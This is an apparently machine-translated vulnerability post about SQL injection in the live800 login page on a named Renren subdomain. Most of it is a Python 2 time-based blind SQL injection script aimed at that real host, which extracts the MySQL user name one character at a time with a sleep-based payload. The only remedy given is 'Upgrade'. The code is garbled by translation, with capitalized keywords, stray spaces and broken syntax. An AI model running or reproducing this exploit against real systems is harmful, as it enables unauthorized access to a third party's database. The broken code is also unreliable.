Renren website has SQL injection vulnerability with verification script

Renren website has SQL injection vulnerability with verification script

Renren website SQL Injection Vulnerability

Recently live800 seems very fire on the dark clouds search... http://live800.wan.renren.com/live800/loginAction.jsp? CompanyLoginName = 1 * & loginName = a111 & password = 111 live800 customer service system this was cracked by the Daniel and found a lijiejie script. At the beginning, the incomplete format cannot be cracked ,,, after a while, after the script is completed, I feel rich and handsome. Haha, please visit the homepage.


Import httplib
Import time
Import string
Import sys
Import random
Import urllib
Headers = {}
Payloads = 'abcdefghijklmnopqrstuvwxyz0123456789 @_.'
Print '[% s] Start to retrive MySQL User:' % time. strftime ('% H: % M: % s', time. localtime ())
User =''
For I in range (1, 21 ):
For payload in payloads:
Try:
S = "ascii (mid (lower (user (), % s, 1) = % s" % (I, ord (payload ))
S = "1 'XOR (if (% s, sleep (3), 0) OR '1" % s
Conn = httplib. HTTPConnection ('live800 .wan.renren.com ', timeout = 3)
Conn. request (method = 'get', url = "/live800/loginAction. jsp? CompanyLoginName = 1% s & loginName = a111 & password = 111 "% urllib. quote (s ))
Conn. getresponse ()
Conn. close ()
Print '.',
Except t Exception, e:
Print e
User + = payload
Print '\ n [in progress]', user,
Time. sleep (3.0)
Break
Print '\ n [Done] MySQL user is % s' % user
Solution:
Upgrade